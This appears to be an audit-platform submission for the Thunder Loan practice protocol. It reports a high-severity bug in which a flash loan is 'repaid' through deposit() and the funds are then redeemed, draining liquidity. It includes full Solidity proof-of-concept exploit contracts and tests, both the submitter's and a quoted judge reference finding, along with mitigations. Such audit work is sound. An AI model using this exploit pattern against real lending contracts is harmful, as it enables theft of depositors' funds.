Thunder Loan

AI First Flight #7
Beginner FriendlyFoundryDeFiOracle
EXP
View results
Submission Details
Severity: high
Valid

`ThunderLoan::flashloan` allows users to deposit the borrowed funds instead of repaying the flash loan, allowing them to drain protocol liquidity

Root + Impact

Description

  • Describe the normal behavior in one or more sentences

  • Explain the specific issue or problem in one or more sentences

**Description:** The `ThunderLoan::flashloan` function allows a malicious flash loan receiver to deposit the borrowed funds back into the `ThunderLoan` contract instead of repaying the flash loan plus fee.
Since deposits are credited to the user, the attacker can later redeem those deposited funds and withdraw the flash loan amount from the protocol, effectively bypassing the flash loan repayment requirement.

Risk

Likelihood:

  • An attacker can repeatedly take flash loans , deposit the borrowed tokens into the protocol and redeem them later

Impact:

  • Attacker can drain the available liquidity from the protocol

  • Impact 2

Proof of Concept

**Proof of Concept:**
1. The attacker takes out a flash loan.
2. Instead of repaying the flash loan, the attacker deposits the borrowed tokens back into the ThunderLoan contract.
3. The attacker redeems the deposited tokens and transfers the funds to their own wallet.
<details>
<summary>Proof Of Code</summary>
paste the following code in to the `ThunderLoanTest.t.sol`
```solidity
function testDepositInsteadOfRepayToStealFunds() public setAllowedToken hasDeposits {
vm.startPrank(user);
uint256 amountToBorrow = 50e18;
uint256 fee = thunderLoan.getCalculatedFee(tokenA, amountToBorrow);
DepositOverRepay dor = new DepositOverRepay(address(thunderLoan));
tokenA.mint(address(dor), fee);
thunderLoan.flashloan(address(dor), IERC20(tokenA), amountToBorrow, "");
dor.redeemMoney();
vm.stopPrank();
assert(tokenA.balanceOf(address(dor)) > amountToBorrow + fee);
}
```
This is a malicious flashloan receiver to be used in the test
also to be pasted in `ThunderLoanTest.t.sol`
```solidity
contract DepositOverRepay is IFlashLoanReceiver {
ThunderLoan thunderLoan;
AssetToken assetToken;
IERC20 s_token;
constructor(address _thunderLoan) {
thunderLoan = ThunderLoan(_thunderLoan);
}
function executeOperation(
address token,
uint256 amount,
uint256 fee,
address /*initiator*/,
bytes calldata /*params*/
)
external
returns (bool)
{
s_token = IERC20(token);
assetToken = thunderLoan.getAssetFromToken(IERC20(token));
IERC20(token).approve(address(thunderLoan), amount + fee);
thunderLoan.deposit(IERC20(token), amount + fee);
return true;
}
function redeemMoney() public {
uint256 amount = assetToken.balanceOf(address(this));
thunderLoan.redeem(s_token, amount);
}
}
```
</details>

Recommended Mitigation

**Recommended Mitigation:**
The protocol should ensure that a flash loan receiver must repay the borrowed amount plus fee before being allowed to deposit the same token into the protocol within the same transaction.
Alternatively, the protocol should track active flash loans and prevent deposits from flash loan receivers until the outstanding loan has been fully repaid.
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 21 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-04] All the funds can be stolen if the flash loan is returned using deposit()

## Description An attacker can acquire a flash loan and deposit funds directly into the contract using the **`deposit()`**, enabling stealing all the funds. ## Vulnerability Details The **`flashloan()`** performs a crucial balance check to ensure that the ending balance, after the flash loan, exceeds the initial balance, accounting for any borrower fees. This verification is achieved by comparing **`endingBalance`** with **`startingBalance + fee`**. However, a vulnerability emerges when calculating endingBalance using **`token.balanceOf(address(assetToken))`**. Exploiting this vulnerability, an attacker can return the flash loan using the **`deposit()`** instead of **`repay()`**. This action allows the attacker to mint **`AssetToken`** and subsequently redeem it using **`redeem()`**. What makes this possible is the apparent increase in the Asset contract's balance, even though it resulted from the use of the incorrect function. Consequently, the flash loan doesn't trigger a revert. ## POC To execute the test successfully, please complete the following steps: 1. Place the **`attack.sol`** file within the mocks folder. 1. Import the contract in **`ThunderLoanTest.t.sol`**. 1. Add **`testattack()`** function in **`ThunderLoanTest.t.sol`**. 1. Change the **`setUp()`** function in **`ThunderLoanTest.t.sol`**. ```Solidity import { Attack } from "../mocks/attack.sol"; ``` ```Solidity function testattack() public setAllowedToken hasDeposits { uint256 amountToBorrow = AMOUNT * 10; vm.startPrank(user); tokenA.mint(address(attack), AMOUNT); thunderLoan.flashloan(address(attack), tokenA, amountToBorrow, ""); attack.sendAssetToken(address(thunderLoan.getAssetFromToken(tokenA))); thunderLoan.redeem(tokenA, type(uint256).max); vm.stopPrank(); assertLt(tokenA.balanceOf(address(thunderLoan.getAssetFromToken(tokenA))), DEPOSIT_AMOUNT); } ``` ```Solidity function setUp() public override { super.setUp(); vm.prank(user); mockFlashLoanReceiver = new MockFlashLoanReceiver(address(thunderLoan)); vm.prank(user); attack = new Attack(address(thunderLoan)); } ``` attack.sol ```Solidity // SPDX-License-Identifier: MIT pragma solidity 0.8.20; import { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol"; import { SafeERC20 } from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol"; import { IFlashLoanReceiver } from "../../src/interfaces/IFlashLoanReceiver.sol"; interface IThunderLoan { function repay(address token, uint256 amount) external; function deposit(IERC20 token, uint256 amount) external; function getAssetFromToken(IERC20 token) external; } contract Attack { error MockFlashLoanReceiver__onlyOwner(); error MockFlashLoanReceiver__onlyThunderLoan(); using SafeERC20 for IERC20; address s_owner; address s_thunderLoan; uint256 s_balanceDuringFlashLoan; uint256 s_balanceAfterFlashLoan; constructor(address thunderLoan) { s_owner = msg.sender; s_thunderLoan = thunderLoan; s_balanceDuringFlashLoan = 0; } function executeOperation( address token, uint256 amount, uint256 fee, address initiator, bytes calldata /* params */ ) external returns (bool) { s_balanceDuringFlashLoan = IERC20(token).balanceOf(address(this)); if (initiator != s_owner) { revert MockFlashLoanReceiver__onlyOwner(); } if (msg.sender != s_thunderLoan) { revert MockFlashLoanReceiver__onlyThunderLoan(); } IERC20(token).approve(s_thunderLoan, amount + fee); IThunderLoan(s_thunderLoan).deposit(IERC20(token), amount + fee); s_balanceAfterFlashLoan = IERC20(token).balanceOf(address(this)); return true; } function getbalanceDuring() external view returns (uint256) { return s_balanceDuringFlashLoan; } function getBalanceAfter() external view returns (uint256) { return s_balanceAfterFlashLoan; } function sendAssetToken(address assetToken) public { IERC20(assetToken).transfer(msg.sender, IERC20(assetToken).balanceOf(address(this))); } } ``` Notice that the **`assetLt()`** checks whether the balance of the AssetToken contract is less than the **`DEPOSIT_AMOUNT`**, which represents the initial balance. The contract balance should never decrease after a flash loan, it should always be higher. ## Impact All the funds of the AssetContract can be stolen. ## Recommendations Add a check in **`deposit()`** to make it impossible to use it in the same block of the flash loan. For example registring the block.number in a variable in **`flashloan()`** and checking it in **`deposit()`**.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!